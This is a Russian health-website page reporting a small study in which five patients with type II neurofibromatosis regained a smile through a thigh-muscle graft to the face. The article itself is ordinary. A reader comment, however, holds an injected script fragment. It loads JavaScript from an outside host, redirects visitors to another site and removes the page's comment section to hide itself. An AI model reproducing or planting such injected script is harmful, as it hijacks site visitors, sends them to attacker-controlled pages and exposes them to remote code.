Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Нейрофиброматоз II типа. ...  >>  Нейрофиброматоз II типа. Возвращение улыбки
 
Обратная связь
 

Нейрофиброматоз II типа. Возвращение улыбки

Размер шрифта
30 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Благодаря новой хирургической технике врачам удалось вернуть улыбку пациентам с параличом лицевого нерва, вызванным нейрофиброматозом II типа.

Что такое нейрофиброматоз

Нейрофиброматоз – это наследственное заболевание нервной системы, которое характеризуется развитием доброкачественных опухолей нервов. Некоторые люди с этим заболеванием имеют едва заметные неврологические проблемы, в то время как другие сильно страдают.

Существуют два основных типа заболевания: нейрофиброматоз I типа и нейрофиброматоз II типа.

  • Нейрофиброматоз I типа проявляется при рождении или в раннем детстве. Он характеризуется наличием нескольких светло-коричневых (как кофе с молоком) пятен и доброкачественных опухолей, которые располагаются на поверхности кожи или под кожей. Также могут быть расширения и деформация костей и искривление позвоночника (сколиоз).
  • Нейрофиброматоз II типа может проявиться в детстве, подростковом периоде или раннем взрослом возрасте. В первую очередь заболевание характеризуется доброкачественной опухолью слухового нерва. Опухоль обычно поражает оба слуховых нерва. В зависимости от точного расположения и размера опухолей могут присутствовать следующие симптомы: нарушение равновесия, нарушения ходьбы, головокружение, головная боль, онемение лица, онемение или боль в различных участках тела, звон в ушах, прогрессирующая потеря слуха.

В некоторых случаях нейрофиброматоз II типа сопровождается параличом лицевого нерва, в результате чего сигналы от головного мозга перестают поступать к мышцам лица. Помимо того, что у пациента возникают проблемы с артикуляцией, приемом пищи и закрыванием глаз, он также теряет возможность выражать свои эмоции, в том числе улыбаться.

Суть исследования

В исследовании приняли участие трое мужчин и две женщины в возрасте от 12 до 50 лет с нейрофиброматозом II типа. У всех пациентов наблюдался тяжелый односторонний паралич лицевого нерва. У большинства пациентов паралич был вызван хирургическим вмешательством по поводу удаления опухоли.

Для восстановления движения мышц лица врачи пересадили пациентам участок мышечной ткани с внутренней поверхности бедра. Участок мышечной ткани с нервами и кровеносными сосудами использовался для замещения поврежденного участка на лице. В восстановительном периоде после операции пациенты получали физиотерапию.

Результаты

Пересадка участка мышечной ткани позволила вернуть пациентам улыбку: если раньше они не могли поднять угол рта на стороне поражения, то теперь это стало возможным. Все пациенты отметили существенное улучшение качества жизни. Кроме того, у некоторых пациентов получалось улыбаться спонтанно. Это является огромным достижением, поскольку при восстановлении подвижности мышц лица с помощью других хирургических техник пациентам приходится прилагать усилия, чтобы улыбнуться.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что надо есть, чтобы не было паралича   Лекарство от рака против паралича   Клещи спасут вас от инфаркта!   Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?  
27 июля 2012Лица, перекошенные болезнью, вновь обретают улыбку! 08 апреля 2013Что надо есть, чтобы не было паралича
 
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 30 января 2013Хотите не чувствовать боли – спите дольше
 

Слайдшоу

1
5 симптомов, которые спасут вашу жизнь
Супереда от Паркинсона
8 самых стыдных проблем со сном

Тесты

Нормальный ли у вас сон?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.